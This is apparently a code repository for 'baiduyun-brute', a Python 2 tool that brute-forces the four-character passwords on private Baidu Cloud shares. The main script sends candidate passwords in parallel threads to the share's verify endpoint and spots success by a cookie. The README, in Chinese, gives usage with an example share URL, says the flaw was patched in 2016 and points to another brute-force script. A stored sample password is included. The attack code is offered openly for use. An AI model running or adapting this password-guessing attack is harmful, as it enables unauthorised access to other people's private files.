├── lib
    ├── __init__.py
    ├── __init__.pyc
    ├── consle_width.pyc
    └── consle_width.py
├── pass.txt
├── README.md
└── baiduyunBrute.py


/lib/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/pass.txt:
--------------------------------------------------------------------------------
1 | 28bk
2 | 


--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/baiduyun-brute/HEAD/lib/__init__.pyc


--------------------------------------------------------------------------------
/lib/consle_width.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/baiduyun-brute/HEAD/lib/consle_width.pyc


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # baiduyun-brute  
 2 | 多线程百度云(私密分享)密码爆破工具  
 3 | 问题请反馈至 i@cdxy.me  
 4 |   
 5 | **2016/6/7 由于漏洞修复，该工具现已失效，多线程定向爆破可参考[https://github.com/Xyntax/POC-T/blob/master/script/brute-example.py](https://github.com/Xyntax/POC-T/blob/master/script/brute-example.py)**  
 6 | 
 7 | ## info  
 8 | 爆破百度云私密分享的四位密码(共168万条)  
 9 | 可自定义线程数(默认为30)  
10 | 自己本子测试30线程一个小时能把字典全跑完  
11 | ## usage  
12 |  1. 复制私密分享页面url  
13 |     ![baiduyun.png](http://www.cdxy.me/wp-content/uploads/2015/12/baiduyun.png)   
14 |  2. `python baiduyunBrute.py -t [thread_num] ["url"]`  
15 |       
16 |     示例(注意url外引号):  
17 |     `python sub.py -t 50 "http://pan.baidu.com/share/init?shareid=385857944&uk=1544574381"`  
18 |  3. 结果在命令行显示，同时存储到`./pass.txt`查看  
19 |     ![pass-found.png](http://www.cdxy.me/wp-content/uploads/2015/12/pass-found.png)  
20 |   
21 | ## reference  
22 |  - 多线程框架参考[lijiejie](https://github.com/lijiejie)大师的项目[subDomainsBrute](https://github.com/lijiejie/subDomainsBrute)
23 | 


--------------------------------------------------------------------------------
/lib/consle_width.py:
--------------------------------------------------------------------------------
 1 | """ getTerminalSize()
 2 |  - get width and height of console
 3 |  - works on linux,os x,windows,cygwin(windows)
 4 | """
 5 | 
 6 | __all__=['getTerminalSize']
 7 | 
 8 | 
 9 | def getTerminalSize():
10 |    import platform
11 |    current_os = platform.system()
12 |    tuple_xy=None
13 |    if current_os == 'Windows':
14 |        tuple_xy = _getTerminalSize_windows()
15 |        if tuple_xy is None:
16 |           tuple_xy = _getTerminalSize_tput()
17 |           # needed for window's python in cygwin's xterm!
18 |    if current_os == 'Linux' or current_os == 'Darwin' or  current_os.startswith('CYGWIN'):
19 |        tuple_xy = _getTerminalSize_linux()
20 |    if tuple_xy is None:
21 |        print "default"
22 |        tuple_xy = (80, 25)      # default value
23 |    return tuple_xy
24 | 
25 | def _getTerminalSize_windows():
26 |     res=None
27 |     try:
28 |         from ctypes import windll, create_string_buffer
29 | 
30 |         # stdin handle is -10
31 |         # stdout handle is -11
32 |         # stderr handle is -12
33 | 
34 |         h = windll.kernel32.GetStdHandle(-12)
35 |         csbi = create_string_buffer(22)
36 |         res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
37 |     except:
38 |         return None
39 |     if res:
40 |         import struct
41 |         (bufx, bufy, curx, cury, wattr,
42 |          left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
43 |         sizex = right - left + 1
44 |         sizey = bottom - top + 1
45 |         return sizex, sizey
46 |     else:
47 |         return None
48 | 
49 | def _getTerminalSize_tput():
50 |     # get terminal width
51 |     # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
52 |     try:
53 |        import subprocess
54 |        proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
55 |        output=proc.communicate(input=None)
56 |        cols=int(output[0])
57 |        proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
58 |        output=proc.communicate(input=None)
59 |        rows=int(output[0])
60 |        return (cols,rows)
61 |     except:
62 |        return None
63 | 
64 | 
65 | def _getTerminalSize_linux():
66 |     def ioctl_GWINSZ(fd):
67 |         try:
68 |             import fcntl, termios, struct, os
69 |             cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))
70 |         except:
71 |             return None
72 |         return cr
73 |     cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
74 |     if not cr:
75 |         try:
76 |             fd = os.open(os.ctermid(), os.O_RDONLY)
77 |             cr = ioctl_GWINSZ(fd)
78 |             os.close(fd)
79 |         except:
80 |             pass
81 |     if not cr:
82 |         try:
83 |             cr = (env['LINES'], env['COLUMNS'])
84 |         except:
85 |             return None
86 |     return int(cr[1]), int(cr[0])
87 | 
88 | if __name__ == "__main__":
89 |     sizex,sizey=getTerminalSize()
90 |     print  'width =',sizex,'height =',sizey


--------------------------------------------------------------------------------
/baiduyunBrute.py:
--------------------------------------------------------------------------------
  1 | # !/usr/bin/env python
  2 | # -*- encoding: utf-8 -*-
  3 | 
  4 | import Queue
  5 | import sys
  6 | import threading
  7 | import time
  8 | import optparse
  9 | import requests
 10 | from lib.consle_width import getTerminalSize
 11 | 
 12 | 
 13 | class baiduBrute:
 14 |     def __init__(self, target, threads_num):
 15 |         self.target = target.replace("link", "verify").replace("init", "verify").strip()
 16 |         self.names_file = "./dic.txt"
 17 |         self.thread_count = self.threads_num = threads_num
 18 |         self.scan_count = self.found_count = 0
 19 |         self.lock = threading.Lock()
 20 |         self.console_width = getTerminalSize()[0]
 21 |         self.console_width -= 2  # Cal width when starts up
 22 |         self._load_pass()
 23 |         # outfile = target + '.txt' if not output else output
 24 |         # self.outfile = open(outfile, 'w')  # won't close manually
 25 |         self.headers = {
 26 |             "Content-Type": "application/x-www-form-urlencoded"
 27 |         }
 28 | 
 29 |     # 读入队列
 30 |     def _load_pass(self):
 31 |         self.queue = Queue.Queue()
 32 |         with open(self.names_file) as f:
 33 |             for line in f:
 34 |                 sub = line.strip()
 35 |                 if sub:
 36 |                     self.queue.put(sub)
 37 | 
 38 |     def _update_scan_count(self):
 39 |         self.lock.acquire()
 40 |         self.scan_count += 1
 41 |         self.lock.release()
 42 | 
 43 |     def _print_progress(self):
 44 |         self.lock.acquire()
 45 |         msg = '%s found | %s remaining | %s scanned in %.2f seconds' % (
 46 |             self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
 47 |         sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
 48 |         sys.stdout.flush()
 49 |         self.lock.release()
 50 | 
 51 |     def _scan(self):
 52 |         while self.queue.qsize() > 0:
 53 |             payload = self.queue.get(timeout=1.0)
 54 |             try:
 55 |                 res = requests.post(url=self.target, data="pwd=" + payload, headers=self.headers)
 56 |                 answer = res.headers["set-cookie"]
 57 |                 if answer:
 58 |                     self.lock.acquire()
 59 |                     if "BDCLND=" in answer:
 60 |                         print "\nOK! password found: " + payload
 61 |                         self.found_count += 1
 62 |                         f = open("./pass.txt", 'w')
 63 |                         f.write(payload + '\n')
 64 |                         f.close()
 65 |                         # exit(1)
 66 |                     else:
 67 |                         pass
 68 |                     self.lock.release()
 69 |             except:
 70 |                 pass
 71 |             self._update_scan_count()
 72 |             self._print_progress()
 73 |         self._print_progress()
 74 |         self.lock.acquire()
 75 |         self.thread_count -= 1
 76 |         self.lock.release()
 77 | 
 78 |     def run(self):
 79 |         self.start_time = time.time()
 80 |         for i in range(self.threads_num):
 81 |             t = threading.Thread(target=self._scan, name=str(i))
 82 |             t.setDaemon(True)
 83 |             t.start()
 84 |         while self.thread_count > 0 and self.found_count == 0:
 85 |             time.sleep(0.01)
 86 | 
 87 | 
 88 | if __name__ == '__main__':
 89 |     parser = optparse.OptionParser('usage: %prog [options] target')
 90 |     parser.add_option('-t', '--threads', dest='threads_num',
 91 |                       default=10, type='int',
 92 |                       help='Number of threads. default = 30')
 93 |     parser.add_option('-o', '--output', dest='output', default=None,
 94 |                       type='string', help='Output file name. default is {target}.txt')
 95 | 
 96 |     (options, args) = parser.parse_args()
 97 |     if len(args) < 1:
 98 |         parser.print_help()
 99 |         sys.exit(0)
100 | 
101 |     d = baiduBrute(target=args[0],
102 |                    threads_num=options.threads_num, )
103 |     d.run()
104 | 


--------------------------------------------------------------------------------